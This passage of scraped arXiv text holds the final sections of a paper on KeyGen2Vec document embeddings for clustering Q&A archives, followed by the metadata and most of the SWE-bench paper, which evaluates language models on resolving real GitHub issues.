Dependency Assumption In our proposed **KeyGen2Vec** framework, keywords as target variables are represented as sequences of words. The probability of a particular keyword chosen in inference stage equals to the joint probability of words in sequence \(p(w_{1:T})\). Softmax activation function is used for projecting decoder states \(s_{t-1}\in R^{d}\) into probabilistic values over \(\mathcal{V}\) vocabulary size, \(\in R^{\mathcal{V}}\). \[p(w_{t}|w_{1},\ldots,w_{t-1};\theta)=\texttt{softmax}(Ws_{t-1}+b)\] \[p(w_{1:T})=\prod_{t}p(w_{t}|w_{1},\ldots,w_{t-1})\] where softmax function is formally given by: \[\texttt{softmax}(z)_{i}=\frac{e^{z_{i}}}{\sum_{j=1}^{K}e^{z_{j}}}\] By dividing each softmax unit (the probability of each word \(w_{t}\) in vocabulary \(\mathcal{V}\)) with the sum of all units, the total probability of words in \(\mathcal{V}\) is ensured to be \(1\). An increase of one class probability \(p(y_{t}|x,\theta)\) causes the probability of other class decreases. We hypothesize that by transforming one-to-many training objective in multi-label keyword generation task into one-to-one multi-class learning scheme, as shown in Figure 5), we indirectly incorporate label dependency assumption during training stage. The trained model treats each sample as mutually exclusive event via softmax normalization and outputs final prediction \(\hat{y_{t}}=\operatorname*{argmax}p(y_{t}|x,\theta)\). This results in an indirect dependent assumption between a pair of keyword labels since the probability of particular pair of keywords given the same document source \(p(y_{1}^{1}|x_{1})\) and \(p(y_{1}^{2}|x_{1})\) are dependent each other. By contrast, standard multi-label learning commonly uses independent Bernoulli assumption via Sigmoid function, disregarding the dependency between labels. We further investigate this problem by comparing models with Softmax-based multi-class classification loss and a standard Sigmoid-based Multi-label classifier. ## 4 Experiments ### Data We use the following data constructed from cQA archives as gold standard for learning and evaluation. The three data sets represent data with different level of difficulties w.r.t. sentence length, noise-level, and number of unique keywords and topic labels. Toy data is considered to be less noisy and balance - each sub-class category is composed of sentences and their paraphrases, forming natural cluster structure. Yahoo! data sets with 5 topic categories (5-T) and 11 topics (11-T) are considered to be more noisy and imbalanced due to many non-informative words (e.g. digits, measures, url-links, query about address or web sources) and domain specific terms (e.g. medical and automotive terms). Toy DataWe created a small set of hand-labelled sentence-keywords-topic pairs (1448 sentences) from WikiAnswer 3. WikiAnswer is a data set composed of millions of questions asked by humans, where each sentence example is accompanied by its paraphrased versions, forming a paraphrase cluster of one particular question. We use the original WikiAnswer corpus to train large scale Word2Vec and PMI models incrementally, to inspect how the scale of data affects model performance. Table. 9 shows a training example in Toy data. The number of keywords and topic assignment per sentence were made fixed, i.e. two keywords and one topic for each sentence. Footnote 3: [http://knowitall.cs.washington.edu/oqa/data/wikianswers/](http://knowitall.cs.washington.edu/oqa/data/wikianswers/) \begin{table} \begin{tabular}{l|c|c|c|c|c} \hline Data set & \#Topics & \#Keywords & \#Train & \#Test & Sentence Length \\ \cline{3-6} & (GLO) & (SUB) & & & Length \\ \hline WikiAnswer & NA & NA & 700M & NA & \(9\pm 3\) \\ Toy data & 12 & 77 & 1158 & 290 & \(9\pm 3\) \\ 5-T Yahoo! cQA & 5 & 120 & 23824 & 5957 & \(36\pm 28\) \\ 11-T Yahoo! cQA & 11 & 179 & 70962 & 17741 & \(35\pm 28\) \\ \hline \end{tabular} \end{table} Table 2: Data set; WikiAnswer (original corpus of Toy data) is used to train Word2Vec (w2v50-tr-lg) and PMI method. \begin{table} \begin{tabular}{|l|} \hline **Source**: “the sporozoan plasmodium carried from host to host by mosquitoes causes what serious infection? \\ \hline **Keywords:** malaria; plasmodium parasite \\ **Topic:** virus and diseases \\ \hline \end{tabular} \end{table} Table 3: Sentence examples in Toy Data set Yahoo! Answer Comprehensive cQAWe reproduce and extend our result on real world cQA archives consisting of question-answers pairs, accompanied by keywords (tags) and the corresponding topic. Data was obtained from Yahoo! Answer Comprehensive cQA dataset 4, originated from the query log of Yahoo! Answer. We constructed two corpora: corpus with 5 topic categorization - referred to as 5-T cQA and corpus with 11 topics - referred to as 11-T cQA. The training and test examples were constructed by concatenating each question and the corresponding answers. Table 4 shows a training example obtained from Yahoo! Answer cQA archives. Likewise, each document corresponds to a fixed membership: two keywords and one topic describing the document semantic abstraction. Footnote 4: [https://webscope.sandbox.yahoo.com/catalog.php](https://webscope.sandbox.yahoo.com/catalog.php) ### Training and Hyper-parameters For training **KeyGen2Vec**, we use negative log-likelihood loss function with an adaptive learning rate optimization Adam [1], \(lr=0.001,betas=(0.9,0.98),eps=1e-9\). Curriculum learning [1] was employed to sampling whether to use a teacher forcing method during training stage. For the other models, we refer the reader to the provided code documentation. For LDA, trainable Word2Vec, Paragraph Vector, we used Gensim implementation 5. BERT pre-trained sentence encoder is taken from a recent sentence similarity task [14]. Specific for Toy data experiment, we trained two Word2Vec models: small scale model Avg-w2v50-tr-sm was trained on the constructed set of Toy data; and large scale model Avg-w2v50-tr-lg was trained incrementally on WikiAnswer (the original large scale corpora of Toy data) - to inspect how model performance differs based on the scale of data. Classifiers (Multi-class and Multi-label) were constructed from fully-connected network (MLP) since we do not find a significant performance differences between using different types of networks (i.e. dense, convolutional, and recurrent). We trained two types of Multi-label classifiers (Sigm-Cls and Softm-Cls) to inspect the effect of incorporating label dependency in multi-label learning. Footnote 5: [https://radimrehurek.com/gensim/](https://radimrehurek.com/gensim/) ### Clustering as Evaluation We use K-Means clustering 6 to evaluate the quality (clusterability) of document embeddings in this study (table 1). The hyper-parameter choices of K-means is kept as minimum as possible (init='random', n_clusters=K, n_init=10, max_iter=50). This is to make sure that the clustering is not overly parameterized, which can obscure the actual quality of the learnt embeddings. Given the actual global semantic classes (topic labels) \(\mathbb{C}\) in the current observed corpora and the predicted classes \(\Omega\) from K-Means method, we employ **Purity**, **Normalized Mutual Information (NMI)**, and **F1-score**[11] metrics to objectively measure whether the resulting clustering \(\Omega\) can recreate or approximate the exact classes \(\mathbb{C}\). Footnote 6: scikit-learn.org/./sklearn.cluster.KMeans.html ### \(\chi^{2}\) Feature selection We employ feature selection based on \(\chi^{2}\) method [11] to select \(N-\) most influential words per topic category. Each training example is then represented as Bag-of-Influential words with \(N\in\{20,50,100,250\}\) for Toy data and \(N\in\{20,50,100,250,500,1000,2500\}\) for Yahoo! cQA data. The larger the size of influential words per category, the more noises preserved in the training data. This \begin{table} \begin{tabular}{|p{34.1pt}|} \hline **Source:** “what is diabetes mellitus? diabetes mellitus is medical disorder characterized by varying or persistent hyperglycemia elevated blood sugar levels,...” \\ **Keywords:** diabetes; diseases and conditions \\ **Topic:** health \\ \hline \end{tabular} \end{table} Table 4: Sentence example (concatenated cQA pair) in Yahoo! Answer cQA \begin{table} \begin{tabular}{|c|c|c|c|} \hline **Dining Out** & **Health** & **Travel** & **Cars** \\ \hline hamburger & medicine & trip & jeep \\ taco & heart & map & vehicle \\ sandwich & symptom & disney & auto \\ buffet & virus & vacation & manual \\ cafe & treatment & ticket & nisan \\ \hline \end{tabular} \end{table} Table 5: Example of influential words per topic category – selected based on \(\chi^{2}\) feature selection method on 5-T Yahoo! cQA. to investigate: (1) the effect of noises on the clusterability of embeddings; (2) the effect of incorporating label dependency via Softmax-based loss on the clusterability of embeddings. ## 5 Results and Discussion We summarize our empirical findings as follows: **KeyGen2Vec** outperforms multi-label classifiers Based on the clustering performance on three data sets, as shown in Table 6-8, we demonstrate that although the model does not exploit the actual topic labels during training stage, the proposed **KeyGen2Vec** has a capability of preserving topical proximity in latent space, outperforming its counterparts - models trained on multi-label classifiers (Sign-Mult-Lbl and Softm-Mult-Lbl). scale of data. See how small scale Word2Vec (Avg-w2v50-tr-sm) results in a notably low performance on Toy data (similar to Autoencoder S2S-AE and Doc2Vec), as compared to large scale Word2Vec (Avg-w2v50-tr-lg). We argue that the low quality of unsupervised embeddings in the current study is due to the models mainly depend on local information in document contents - there is no strong assumption on differentiating salient features (words) w.r.t. global semantic aspects, which may hinder their direct utilization on a subsequent predictive analytics tasks. Specific to LDA topic model, we argue that their low performance in the current task is due to no strong assumption on distinguishing between local (keywords - or more specific document theme) and global (more general) latent topics. The effects of noises on embedding qualityWe argue that the main reason why the current clustering task is challenging for all observed models, specifically unsupervised ones is mainly due to the _noisy_ characteristic of cQA archives. For instance, topic "Health" and "Dining out" may both contain queries about dietary or source of healthy food. Topic "Cars", "Travel", "Local Business" may all contain queries about car rental and service. We empirically show that in a clean scenario - where training examples only contain \(N\)-most influential words w.r.t. topic category (Toy data experiment in fig.7a) unsupervised methods sufficiently perform well. The performance, however, degrades in the occurrence of noises (larger pre-selected feature size). By contrast, **KeyGen2Vec** can maintain its considerably high performance (fig.7a-7c) regardless the presence of noises. This indicates the exposure of keywords as sub-topical information benefits the model to obtain high quality embeddings. Problem reformulation improves the expressiveness of embeddingsRedefining one-to-many multi-label learning into one-to-one multi-class learning scheme via Softmax normalization, which we argue is analogous to indirectly incorporating label dependency (sec. 3.2), benefits **KeyGen2Vec** and Multi-label learning in the current study, resulting in a more accurate embedding (higher \(F_{1}\)-score, in table 6-8 and fig.7a-7c). ## 6 Conclusion We extensively investigate document embedding approaches for topical clustering of cQA archives. We show current limitations of unsupervised embeddings on dealing with noisy articles, indicating the need of incorporating strong assumption either on learning approach or data. Our empirical results highlight the capability of the proposed **KeyGen2Vec** in preserving topical proximity in latent space via multi-label multi-class learning.
2310.06770
SWE-bench: Can Language Models Resolve Real-World GitHub Issues?
Language models have outpaced our ability to evaluate them effectively, but for their future development it is essential to study the frontier of their capabilities. We find real-world software engineering to be a rich, sustainable, and challenging testbed for evaluating the next generation of language models. To this end, we introduce SWE-bench, an evaluation framework consisting of $2,294$ software engineering problems drawn from real GitHub issues and corresponding pull requests across $12$ popular Python repositories. Given a codebase along with a description of an issue to be resolved, a language model is tasked with editing the codebase to address the issue. Resolving issues in SWE-bench frequently requires understanding and coordinating changes across multiple functions, classes, and even files simultaneously, calling for models to interact with execution environments, process extremely long contexts and perform complex reasoning that goes far beyond traditional code generation tasks. Our evaluations show that both state-of-the-art proprietary models and our fine-tuned model SWE-Llama can resolve only the simplest issues. The best-performing model, Claude 2, is able to solve a mere $1.96$% of the issues. Advances on SWE-bench represent steps towards LMs that are more practical, intelligent, and autonomous.
Carlos E. Jimenez, John Yang, Alexander Wettig, Shunyu Yao, Kexin Pei, Ofir Press, Karthik Narasimhan
2023-10-10T16:47:29Z
http://arxiv.org/abs/2310.06770v2
# SWE-bench: Can Language Models Resolve Real-World GitHub Issues? ###### Abstract Language models have outpaced our ability to evaluate them effectively, but for their future development it is essential to study the frontier of their capabilities. We consider real-world software engineering to be a rich, sustainable, and challenging testbed for evaluating the next generation of language models. We therefore introduce SWE-bench, an evaluation framework including \(2\),\(294\) software engineering problems drawn from real GitHub issues and corresponding pull requests across \(12\) popular Python repositories. Given a codebase along with a description of an issue to be resolved, a language model is tasked with editing the codebase to address the issue. Resolving issues in SWE-bench frequently requires understanding and coordinating changes across multiple functions, classes, and even files simultaneously, calling for models to interact with execution environments, process extremely long contexts and perform complex reasoning that goes far beyond traditional code generation. Our evaluations show that both state-of-the-art proprietary models and our fine-tuned model SWE-Llama can resolve only the simplest issues. Claude 2 and GPT-4 solve a mere \(4.8\%\) and \(1.7\%\) of instances respectively, even when provided with an oracle retriever. Advances on SWE-bench represent steps towards LMs that are more practical, intelligent, and autonomous. ## 1 Introduction Language models (LMs) are rapidly being deployed in commercial products such as chatbots and coding assistants. At the same time, existing benchmarks have become saturated (Kiela et al., 2021; Ott et al., 2022) and fail to capture the frontier of what state-of-the-art LMs can and cannot do. There is a need for challenging benchmarks that more accurately reflect real-world applications of LMs to help shape their future development and usage (Srivastava et al., 2023). Building a good benchmark is difficult since tasks must be challenging enough to stump existing models, but model predictions must also be easy to verify (Martinez-Plumed et al., 2021). Coding tasks are appealing as they pose challenging problems to LMs and generated solutions can be easily verified by running unit tests. However, existing coding benchmarks, such as HumanEval (Chen et al., 2021), mostly involve self-contained problems that can be solved in a few lines of code. Figure 1: SWE-bench sources task instances from real-world Python repositories by connecting GitHub issues to merged pull request solutions that resolve related tests. Provided with the issue text and a codebase snapshot, models generate a patch that is evaluated against real tests. In the real world, software engineering is not as simple. Fixing a bug might involve navigating a large repository, understanding the interplay between functions in different files, or spotting a small error in convoluted code. Inspired by this, we introduce SWE-bench, a benchmark that evaluates LMs in a realistic software engineering setting. As shown in Figure 1, models are tasked to resolve issues (typically a bug report or a feature request) submitted to popular GitHub repositories. Each task requires generating a patch describing changes to apply to the existing codebase. The revised codebase is then evaluated using the repository's testing framework. SWE-bench offers several advantages over existing LM programming benchmarks. These include, a realistic setting that utilizes user-submitted issues and solutions, diverse inputs featuring unique code problems from \(12\) repositories, a robust framework for execution-based evaluation, and the ability to continuously update the benchmark with new instances, requiring minimal human intervention. We evaluate SWE-bench on multiple state-of-the-art LMs and find that they fail to solve all except the simplest issues. For instance, Claude 2 and GPT-4 only resolve \(4.8\%\) and \(1.7\%\) of tasks respectively; even using an oracle that retrieves the files to edit from a reference solution. Using a BM25 retriever, performance drops further to \(1.96\%\) for Claude 2. To aid open model development in this direction, we release a training dataset, SWE-bench-train consisting of \(19{,}000\) non-testing task instances from \(37\) other repositories. Using this dataset, we finetune two models, SWE-Llama \(7\)b and \(13\)b based on CodeLlama (Roziere et al., 2023), that are competitive with Claude 2 and can solve issues using over \(100{,}000\) tokens as context. We hope SWE-bench serves as a challenging software engineering benchmark that aids in better understanding of the abilities and limitations of LMs. ## 2 SWE-bench SWE-bench is a benchmark featuring GitHub _issues_ from popular repositories that report bugs or request new features, and _pull requests_ that make changes to the repository to resolve these issues. The task is to generate a pull request that addresses a given issue and passes tests related to the issue. ### Benchmark Construction GitHub is a rich data source for software development, but repositories, issues, and pull requests can be noisy, ad-hoc, or poorly documented or maintained. To find high-quality task instances at scale, we use a \(3\)-stage pipeline as follows. **Stage I: Repo selection and data scraping**. We start by collecting pull requests (PRs) from \(12\) popular open-source Python repositories on GitHub, producing about \(\sim 90{,}000\) PRs in total. We focus on popular repositories as they tend be better maintained, have clear contributor guidelines, and have better test coverage. Each PR has an associated codebase, which is the state of the repository before the PR was merged. **Stage II: Attribute-based filtering**. We create candidate tasks by selecting the _merged_ PRs that (1) resolve a GitHub issue and (2) make changes to the test files of the repository, which indicates that the user likely contributed tests to check whether the issue has been resolved. **Stage III: Execution-based filtering**. For each candidate task, we apply the PR's test content, and log the associated test results _before_ and _after_ the PR's other content is applied. We filter out task instances without at least one test where its status changes from a _fail_ to _pass_ (henceforth referred to as _fail-to-pass_ test). We also filter out instances that result in installation or runtime errors. Through these stages of filtering, the original \(90{,}000\) PRs are filtered down to the \(2{,}294\) task instances which comprise SWE-bench. A final breakdown of these task instances across repositories Figure 2: SWE-bench task instances are created from merged pull requests that resolve an issue, contributes tests, and install successfully. is presented in Figure 3, and Table 1 highlights the key features of SWE-bench task instances. We highlight that the codebases are large with thousands of files, and the reference pull requests often make changes to multiple files at once. Technical details about SWE-bench's construction pipeline are discussed in Appendix A. More statistics are in Appendix A.5. ### Task Formulation **Model input.** A model is given an issue text description and a complete codebase. The model is then tasked to make an edit to the codebase to resolve the issue. In practice, we represent edits as patch files, which specify which lines in the codebase to modify in order to resolve the issue. **Evaluation metrics.** To evaluate a proposed solution, we apply the generated patch, using unix's patch program, to the codebase and then execute the unit and system tests associated with the task instance. If the patch applies successfully and all of these tests pass we consider the proposed solution to have successfully resolved the issue. The metric for our benchmark is the percentage of task instances that are resolved. Additional technical details in Appendix A.4. ### Features of SWE-bench Traditional benchmarks in NLP typically involve only short input and output sequences and consider somewhat "contrived" problems created specifically for the benchmark. In contrast, SWE-bench's realistic construction setting imbues the dataset with unique properties, which we discuss below. **Real-world software engineering tasks**. Since each task instance in SWE-bench consists of a large and complex codebase and a description of a relevant issue, solving SWE-bench requires demonstrating sophisticated skills and knowledge possessed by experienced software engineers but are not commonly evaluated in traditional code generation benchmarks. **Continually updatable**. Our collection process can be easily applied to any Python repository on GitHub and requires almost no human intervention. Therefore, we can extend SWE-bench with a continual supply of new task instances and evaluate LMs on issues created after their training date, which ensures that the solution was not included in their training corpus. **Diverse long inputs.** Issue descriptions are typically long and detailed (\(195\) words on average), and codebases regularly contain many thousands of files. Solving SWE-bench requires identifying the relatively small number of lines that need to be edited to solve the issue amongst a sea of context. **Robust evaluation.** For each task instance, there is at least one _fail-to-pass_ test which was used to test the reference solution, and \(40\%\) of instances have at least two fail-to-pass tests. These tests evaluate whether the model addressed the problem in the issue. In addition, a median of \(51\) additional tests run to check whether prior functionality is properly maintained. **Cross-context code editing.** Unlike prior settings that may constrain scope to a function or class (e.g., Chen et al., 2021; Cassano et al., 2022) or provide _cloze_-style fill-in blanks (e.g., Lu et al., 2021; Fried et al., 2023), SWE-bench does not provide such explicit guidance. Rather than merely having to produce a short code snippet, our benchmark challenges models to generate revisions in multiple locations of a large codebase. SWE-bench's reference solutions average editing \(1.7\) files, \(3.0\) functions, and \(32.8\) lines (added or removed). **Wide scope for possible solutions.** The task of repository-scale code editing can serve as a level playing field to compare approaches ranging from retrieval and long-context models to decision-making agents, which could reason and act in code. SWE-bench also allows creative freedom, as models can generate novel solutions that may deviate from the reference PR. ## 3 SWE-Llama: Fine-tuning CodeLlama for SWE-bench It is important to benchmark the performance of open models on SWE-bench alongside proprietary models. At the time of writing, only the CodeLlama models (Roziere et al., 2023) are able to handle the very long contexts necessary. However, we observe that the off-the-shelf CodeLlama variants are not capable of following the detailed instructions to generate repository-wide code edits, and typically output placeholder responses or unrelated code. To evaluate the capabilities of these models, we perform supervised fine-tuning on the \(7\) billion- and \(13\) billion-parameter CodeLlama Python models. The resulting models are specialized repository editors that can run on consumer hardware and resolve GitHub issues. **Training data.** We follow our data collection procedure and collect \(19{,}000\) issue-PR pairs from an additional 37 popular Python package repositories. In contrast to Section 2.1, we do not require that pull requests contribute test changes. This allows us to create a much larger training set to use for supervised fine-tuning. To minimize the risk of any data contamination, the set of repositories in the training data are disjoint from the packages included in the evaluation benchmark. **Training details.** Given the instructions, an issue text from GitHub and the relevant code files as the prompt, we finetune SWE-Llama to generate the patch that solved the given issue (the "gold patch"). For memory efficiency, we fine-tune only the weights of the attention sublayer using LoRA Hu et al. (2022), and exclude training sequences with more than \(30{,}000\) tokens, reducing the effective size of the training corpus to \(10{,}000\) instances. More details are provided in Appendix B. ## 4 Experimental Setup In this section we explain how inputs are constructed to run SWE-bench evaluation. In addition, we review the models that we evaluate in this work. ### Retrieval-Based Approach SWE-bench instances provide an issue description and a codebase as input to the model. While issues descriptions are usually short (\(195\) words on average as shown in Table 1), codebases consist of many more tokens (\(438\)K lines on average) than can typically be fit into an LMs context window. Then the question remains of exactly how to choose the relevant context to provide to the model during generation? To address this issue for our baselines, we simply use a generic retrieval system to select the files to insert as context. In particular, we evaluate models under two relevant context settings: 1) sparse retrieval and 2) an oracle retrieval. **Sparse retrieval.** Dense retrieval methods are ill-suited to our setting due to very long key and query lengths, and especially the unusual setting of retrieving code documents with natural language queries. Therefore, we choose to use BM25 retrieval (Robertson et al., 2009) to retrieve relevant files to provide as context for each task instance. We experiment with three different maximum context limits, and simply retrieve as many files as fits within the specified limit. We evaluate each model on all limits that fit within its context window and report the best performance. **"Oracle" retrieval.** We additionally consider a setting where we only use all files edited by the reference patch that solved the issue on GitHub. This "oracle" retrieval setting is less realistic, since a software engineer working on addressing an issue does not know a priori which files may need to be modified. However, this setting is also not necessarily comprehensive since edited files alone may not include all the required context to understand exactly how software will behave when interacting with unseen parts of the code. \begin{table} \begin{tabular}{l l r r} \hline \hline & & Mean & Max \\ \hline Issue Text & Length (Words) & 195.1 & 4477 \\ \hline \multirow{2}{*}{Codebase} & \# Files (non-test) & 3,010 & 5,890 \\ & \# Lines (non-test) & 438K & 886K \\ \hline \multirow{2}{*}{Gold Patch} & \# Lines edited & 32.8 & 5888 \\ & \# Files edited & 1.7 & 31 \\ & \# Func. edited & 3 & 36 \\ \hline \multirow{2}{*}{Tests} & \# Fail to Pass & 9.1 & 1633 \\ & \# Total & 120.8 & 9459 \\ \hline \hline \end{tabular} \end{table} Table 1: Average and maximum numbers characterizing different attributes of a SWE-bench task instance. Statistics are micro-averages calculated without grouping by repository. Figure 3: Distribution of SWE-bench tasks (in parenthesis) across 12 open source GitHub repositories that each contains the source code for a popular, widely downloaded PyPI package. We compare the BM25 retrieval results against the "oracle" retrieval setting in Table 3, where we see that BM25 retrieves a superset of the oracle files in about \(40\%\) of instances with the \(27{,}000\) token context limit but only also excludes all of the oracle files in over half of instances. ### Input Format Once the retrieved files are selected using one of the two methods above, we construct the input to the model consisting of task instructions, the issue text, retrieved files and documentation, and finally an example patch file and prompt for generating the patch file. Examples of instances and further details on this formulation are provided in Appendix D. ### Models Due to the need to process long sequence lengths, there are only a few models that are currently suitable for SWE-bench. Thus we evaluate ChatGPT-3.5 (gpt-3.5-turbo-16k-0613), GPT-4 (gpt-4-32k-0613), Claude 2, and SWE-Llama with their context limits shown in Table 2. ## 5 Results In this section, we report results for models in a multitude of settings with different retrieval mechanism and prompting style, then provide some analysis and insight into model performance and difficulty. We summarize models' performance on both the BM25 and "oracle" retrieval settings in Table 5. Across the board, models struggle significantly to resolve issues. The best performing model, Claude 2, only achieves a mere \(4.8\%\) pass rate using the "oracle" retrieval context. When evaluated in the BM25 retrieval setting, Claude 2's performance drops to \(1.96\%\). Performance in the BM25 retrieval setting highlights the importance of choosing appropriate context, which becomes a theme in our analysis that we discuss further below. **Difficulty differs across repositories.** When breaking performance down by repository we observe that all models show similar trends across different repositories. Despite this, the issues resolved by each model do not necessarily overlap extensively. For example, in the "oracle" setting Claude 2 and SWE-Llama 13b perform comparably, with each model resolving \(110\) and \(91\) instances respectively. Yet of these instances, Claude 2 only solves \(42\%\) of the instances solved by SWE-Llama. This may also be related to the presence of images in issues, which can be encoded into the issue markdown with embedded image links (i.e.!{image}[https://...]). Some repositories naturally feature more instances with images; for example \(32\)% of matplotlib and \(10\)% of seaborn instances contain embedded images in their issue text compared to just \(2\)% of all instances. Solving these instances may require multi-modal LMs or some kind of external tool use to process images. **Difficulty correlates with context length.** Models may be pre-trained on long sequences of code but are typically asked to generate single functions at a time with limited context provided to frame the question. Shown in Figure 5, we see that as total context length increases, Claude 2's performance drops considerably; behavior that is also observed in other models. In our evaluation settings, models see a lot of code that may not be directly related to solving the issue at hand, and they seem to frequently struggle with localizing problematic code needing to be updated. This result corroborates other studies showing that models can become distracted by additional context or as the target sequence moves earlier or later within the context window (Liu et al., 2023b). Even when increasing the maximum context size for BM25 would increase recall with respect to the oracle files, performance can still drop, as shown in Table 4, as models are simply ineffective at localizing problematic code in a sea of tokens. Further investigating this, we provide an input ablation on the "oracle" retrieval context, where retrieved files are collapsed entirely, except for the lines actually edited by the true pull request (with \(\pm 15\) lines of buffer) shown in Figure 6. In this setting, we see increases in performance, with GPT-4 jumping from \(1.3\%\) to \(3.4\%\) and Claude 2 from \(4.8\%\) to \(5.9\%\). **Difficulty does not correlate with issue resolution date.** In Table 7 we show model results in the "oracle" retrieval setting, partitioned by date, for PRs created before or after 2023. We find that for most models there's little difference in performance before or after this date, with the exception of GPT-4. We consider this result to be largely promising as it suggests that despite models having \begin{table} \begin{tabular}{l c c} \hline \hline \multirow{2}{*}{Model} & \multicolumn{2}{c}{“Oracle”-collapsed} \\ \cline{2-3} & Resolved & Applied \\ \hline \hline ChatGPT-3.5 & 1.0 & 23.2 \\ Claude 2 & **5.9** & **47.6** \\ GPT-4 & 3.4 & 18.8 \\ \hline \hline \end{tabular} \end{table} Table 6: We show the results for the “Oracle”-collapsed retrieval setting, which uses oracle files but collapses code that isn’t directly modified by the PR \(\pm 15\) lines. Figure 4: Resolution rate for three models across the 12 repositories represented in SWE-bench. Figure 5: We compare the performance of Claude 2 on tasks partitioned by total input length and by only the issue length. \begin{table} \begin{tabular}{l c c c c} \hline \hline & \multicolumn{2}{c}{BM25 Retrieval} & \multicolumn{2}{c}{“Oracle” Retrieval} \\ \cline{2-5} Model & \% Resolved & \% Apply & \% Resolved & \% Apply \\ \hline ChatGPT-3.5 & 0.20 & 10.50 & 0.52 & 12.38 \\ Claude 2 & **1.96** & 29.86 & **4.80** & 47.00 \\ GPT-4\({}^{*}\) & 0.00 & 4.50 & 1.74 & 13.20 \\ SWE-Llama 7b & 0.70 & 37.84 & 3.00 & **54.80** \\ SWE-Llama 13b & 0.70 & **39.41** & 4.00 & 52.10 \\ \hline \hline \end{tabular} \end{table} Table 5: We compare models against each other using the BM25 and oracle retrieval settings as described in Section 4. \({}^{*}\)Due to budget constraints we evaluate GPT-4 on a \(25\)% random subset of SWE-bench in the “oracle” and BM25 27K retriever settings only. been exposed to some version of an repository's codebase, they are unlikely to "cheat" to address issues simply by generating a more recent version of the repository. **Finetuned models are sensitive to context distribution shifts.** The finetuned models SWE-Llama 7b and 13b perform surprisingly poorly with BM25 retrieved context. As these models were finetuned using the "oracle" retrieval as context, we suspect this shift in context makes it difficult for the model to perform reliably. For instance, SWE-Llama was trained to edit every file included as context whereas in the BM25 setting many files provided in context are not expected to be changed. **Generating patches is easier than generating whole files.** Models are often trained using standard code files and likely rarely see patch files. We generally formulate our task to have models generate patch files as opposed to recreating the entire file with their proposed change, since patch files will usually be a much more efficient representation of a file change. As shown in Table 5, we observe that models still struggle with generating well-formatted patch files. So we experiment with asking models to instead regenerate entire files with their proposed changes to resolve the issue. In this setting, we find that models generally perform worse at this task than when generating patch files; for instance, Claude 2 scores at \(2.2\%\) compared to \(4.8\%\) in the main table for "oracle" retrieval. Even when controlling for instance length, generating on the shorter half of the task instances by input tokens yields \(3.9\%\) compared to \(7.8\%\) for generating patches with Claude 2. **Language models tend to generate shorter, simpler edits.** Model generated patch files tend to add and remove fewer lines than their respective gold patch. As shown in Table 8, compared to an average gold patch, model generated patch files that apply correctly are less than half the total length (\(74.5\) versus \(30.1\) lines) of gold edit patch files, and rarely edit more than a single file. ### A Qualitative Analysis of SWE-Llama Generations We select \(11\) generations from SWE-Llama and Claude 2 collectively to better understand the quality of the task and generated patches under the "oracle" retrieval setting. Here we discuss one example \begin{table} \begin{tabular}{l c c c c c} \hline \hline & Claude 2 & ChatGPT-3.5 & GPT-4\({}^{*}\) & SWE-Llama 7b & SWE-Llama 13b \\ \hline Before 2023 & **4.87** & 0.49 & **1.63** & **3.98** & 2.95 \\ From 2023 & 4.23 & **0.77** & 0.0 & 3.85 & **3.46** \\ \hline \hline \end{tabular} \end{table} Table 7: We compare model performance on task instances from before or after 2023. Most models show little difference in performance. \({}^{*}\)Due to budget constraints, GPT-4 is evaluated on a \(25\%\) random subset of SWE-bench tasks, which may impact performance here. \begin{table} \begin{tabular}{l c c c c c} \hline \hline Model & Total Lines & Added & Removed & Functions & Files \\ \hline Claude 2 & 19.6 & 4.2 & 1.9 & 1.1 & 1.0 \\ Gold & 44.1 & 12.0 & 5.8 & 2.1 & 1.2 \\ \hline ChatGPT-3.5 & 30.1 & 3.8 & 2.7 & 1.6 & 1.0 \\ Gold & 39.6 & 9.5 & 6.1 & 1.9 & 1.2 \\ \hline GPT-4 & 20.9 & 4.4 & 1.5 & 1.0 & 1.0 \\ Gold & 33.6 & 8.4 & 3.8 & 1.9 & 1.1 \\ \hline SWE-Llama 13b & 17.6 & 1.6 & 1.2 & 1.2 & 1.1 \\ Gold & 37.8 & 10.0 & 4.4 & 1.9 & 1.1 \\ \hline SWE-Llama 7b & 16.7 & 1.3 & 1.2 & 1.2 & 1.1 \\ Gold & 40.2 & 11.3 & 4.9 & 1.9 & 1.1 \\ \hline Avg Gold & 39.1 & 10.2 & 5.0 & 1.9 & 1.1 \\ All Gold & 74.5 & 22.3 & 10.5 & 3.0 & 1.7 \\ \hline \hline \end{tabular} \end{table} Table 8: Average edits of model generated patches in the oracle retrieval setting across successfully applied patches. For the task instances specific to each model, we calculate the same statistics across the gold patches. Avg Gold shows statistics macro-averaged over each models’ respective gold patches. All Gold shows statistics for all gold patches unconditioned on model performance. from SWE-Llama and summarize our overall findings, with in-depth analyses for the remaining examples shown in Appendix F. We'll consider the task instance sphinx-doc_sphinx-8713 from the Sphinx documentation generator, shown in Figure 6. The issue states that the napoleon extension of Sphinx is not properly formatting the documentation keyword "Other Parameters" when the config setting napoleon.use_param is set to True. The issue text further provides a detailed code snippet of where the problematic source code is suspected to be, as well as some code examples for reproducing the error and additional information related to package versions. For this particular instance, the model did not resolve the task, failing to pass some of the tests resolved by the gold solution. In the "oracle" retrieval setting, the model input provides this issue text along with some instructions, the full contents of files edited by the gold patch, and an example of the diff format we expect the answer to be in. The total model input consists of \(1{,}558\) lines of context or \(20{,}882\) tokens. When comparing the gold patch and the model's patch, we find an obvious mistake. While the model edits the correct function, parse_other_parameters_section at line \(684\) in sphinx/ext/napoleon/docstring.py, it changes the function to behave as if napoleon.use_param were always True instead of checking the config setting first and copying what the parse_parameters_section does, like the gold patch. In the tests, test_parameters_with_class_reference directly compares the documentation produced using a config where napoleon_use_param is set to False, which catches the model's error immediately. Comparing results across all the examples we consider, we notice a few prominent trends in behavior. Models tend to write primitive Python code and do not leverage existing third-party libraries or the rest of the codebase for their solutions. Models' generations also reflect a "greedy" approach of solving the problem _exactly_, with little regard for code style or logical constraints that might be reflected by the codebase (i.e. using relative instead of absolute imports). In contrast, we observe that many gold patches will make structural improvements that cover a much larger scope of the codebase; these edits not only resolve the issue, but also anticipate and solve obvious potential future issues. We present additional case studies and identify more nuanced discrepancies in Appendix F. ## 6 Related Work **Evaluation of LMs.** Several recent works for evaluating LMs have either proposed a collection of mutually distinct tasks spanning across multiple domains (Hendrycks et al., 2021; Liang et al., 2022; Srivastava et al., 2023) or turned to the web as an interactive setting featuring tasks that require multiple steps to solve (Yao et al., 2022; Zhou et al., 2023; Deng et al., 2023; Liu et al., 2023). There are several drawbacks with such a "potpourri" style setup. First, each task tends to narrowly focus on Figure 6: We show an example of an formatted task instance, a model prediction, and the testing framework logs. Results and 